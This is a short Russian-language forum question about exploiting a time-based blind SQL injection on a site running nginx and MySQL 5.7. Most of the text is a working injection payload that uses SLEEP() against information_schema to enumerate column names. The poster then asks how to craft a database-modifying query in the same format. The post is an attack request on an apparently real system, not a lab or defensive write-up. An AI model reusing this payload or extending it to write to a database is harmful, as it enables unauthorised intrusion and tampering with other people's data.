Time-based SQL Injection
Такой вопрос , на nginx mysql 5.7 версии срабатывает такая уязвимость, как будет выглядеть запрос на обновление базы данных в таком же формате:
Параметр='+(select*from(select(if(length((select column_name from information_schema.columns where table_schema=database() and table_name="table" limit 0,1))>1,SLEEP(20),1)))a)+'